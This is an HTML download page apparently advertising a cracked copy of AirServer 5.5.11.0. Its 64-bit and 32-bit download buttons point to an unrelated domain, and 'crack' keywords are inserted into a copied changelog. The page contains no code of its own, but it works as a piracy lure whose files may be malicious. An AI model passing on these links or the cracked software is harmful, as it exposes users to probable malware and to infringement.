<!DOCTYPE html>
<html lang="en">
<head>
<title>Airserver 5.5.11.0</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- Add icon library -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
.btn {
  background-color: DodgerBlue;
  border: none;
  color: white;
  padding: 12px 30px;
  cursor: pointer;
  font-size: 20px;
margin: 50px 0 10px 0;
}
section {
    background-color: #f1f1f1;
}
/* Darker background on mouse-over */
.btn:hover {
  background-color: #3398fb;
	position: relative;
    top: 1px;
    left: 1px;
}
	
* {
  box-sizing: border-box;
}

body {
  font-family: Arial, Helvetica, sans-serif;
	max-width: 1000px;
	margin: 0 auto !important;
}

/* Style the header */
header {
 background-image: url("https://raw.githubusercontent.com/vlh11098/airserver/master/AirServer-5.5.11-crack.png");
    height: 300px;
 	width: 100%;
  background-position: center; 
  background-repeat: no-repeat; 
  background-size: cover; 
  background-color: #f1f1f1;
  padding: 30px;
  text-align: center;
  font-size: 35px;
  color: white;
}

img.logo-img {
    width: 400px;
}

/* Create two columns/boxes that floats next to each other */
nav {
  float: left;
  width: 30%;
  height: 300px; /* only for demonstration, should be removed */
  background: #ccc;
  padding: 20px;
}

/* Style the list inside the menu */
nav ul {
  list-style-type: none;
  padding: 0;
}

article {
  float: left;
  padding: 20px;
  width: 100%;
  background-color: #f1f1f1;
}

/* Clear floats after the columns */
section:after {
  content: "";
  display: table;
  clear: both;
}

/* Style the footer */
footer {
  background-color: #777;
  padding: 10px;
  text-align: center;
  color: white;
}

/* Responsive layout - makes the two columns/boxes stack on top of each other instead of next to each other, on small screens */
@media (max-width: 600px) {
  nav, article {
    width: 100%;
    height: auto;
  }
}

.h1-h1 {
    text-align: center;
    color: #374858;
    font-size: 28px;
    margin: 0;
    padding: 0;
}

h1 {
    margin: 0;
    padding: 0;
}
a.home-page {
    font-size: 14px;
    font-weight: 600;
}
</style>
	

	
</head>
<body>



<header>
	

</header>

<section>

<center>
<br/><img style="vertical-align: bottom" src="https://raw.githubusercontent.com/vlh11098/airserver/master/airserver.png" alt="Airserver 5.5.11.0 - No Logo Trial" class="logo-img" />
</center>
  
  <article>
<div class="h1-h1">	<h1>Airserver 5.5.11.0 - No Logo Trial</h1></div>

<center>
	
<a target="_blank" href="http://khabarbabal.online/file/MWZjND">
<button class="btn"><i class="fa fa-download"></i> DOWNLOAD 64Bit </button>
</a>
</br>
<a target="_blank" href="http://khabarbabal.online/file/ZjBmNj">
<button class="btn"><i class="fa fa-download"></i> DOWNLOAD 32Bit</button>
</a>
 <br/>
 <br/><a class="home-page" href="https://www.airserver.com/buy" target="_blank" title="airserver.com">BUY IT</a><br/><br/><br/>
</center>

<body style="margin: 0; padding: 0" cz-shortcut-listen="true">
        <table class="dots">
            <tbody><tr>
                <td class="blue">
                    <h3><a href="#">Version 5.5.11 - February 5, 2020</a></h3>
                </td>
            </tr>
            <tr>
                <td valign="top">
                    <ul>
                        <li>Added support for Oculus.</li>
                        <li>Fixed compatibility issues with <a rel="dofollow" title="Airserver 5.5.11 crack" href="/airserver-5.5.11-crack.html" target="_blank">Airserver 5.5.11 crack</a> Connect app.</li>
                        <li>Fixed issue that caused a numpad to appear when needing to enter a password for AirPlay.</li>
                        <li>Fixed YouTube login prompt issue.</li>
                        <li>Fixed discovery issues with Google Cast and AirPlay.</li>
                        <li>Administrator privileges are now always required to deactivate AirServer within the application.</li>
                    </ul>
                </td>
            </tr>
        </tbody></table>
        <table class="dots">
            <tbody><tr>
                <td class="blue">
                    <h3><a href="#">Version 5.5.10 - September 3, 2019</a></h3>
                </td>
            </tr>
            <tr>
                <td valign="top">
                    <ul>
                        <li>Fixed live streaming to YouTube.</li>
                        <li>Fixed compatibility issues with AirServer Connect app.</li>
                        <li>Fixed AirServer not showing up on older iOS devices running iOS7 and iOS8.</li>
                    </ul>
                </td>
            </tr>
        </tbody></table>
        <table class="dots">
            <tbody><tr>
                <td class="blue">
                    <h3><a href="#">Version 5.5.7 - June 28, 2019</a></h3>
                </td>
            </tr>
            <tr>
                <td valign="top">
                    <ul>
                        <li>Fixed Miracast to allow more than one connection at the same time.</li>
                        <li>Fixed Miracast on older Windows 10 versions.</li>
                        <li>Improved Google Cast discovery.</li>
                        <li>Improved overall performance.</li>
                    </ul>
                </td>
            </tr>
        </tbody></table>
        <table class="dots">
            <tbody><tr>
                <td class="blue">
                    <h3><a href="#">Version 5.5.4 - October 12, 2018</a></h3>
                </td>
            </tr>
            <tr>
                <td valign="top">
                    <ul>
                        <li>Fixed Miracast receiver on systems running Windows 10 - 1809 or newer.</li>
                        <li>Enabled Miracast over infrastructure security.</li>
                        <li>Added Miracast over infrastructure PIN support.</li>
                    </ul>
                </td>
            </tr>
        </tbody></table>
        <table class="dots">
            <tbody><tr>
                <td class="blue">
                    <h3><a href="#">Version 5.5.3 - April 11, 2018</a></h3>
                </td>
            </tr>
            <tr>
                <td valign="top">
                    <ul>
                        <li>Fixed Miracast receiver on systems running Windows 10 - 1803 or newer.</li>
                    </ul>
                </td>
            </tr>
        </tbody></table>
     
    

</body>

  </article>
</section>

</body>
</html>
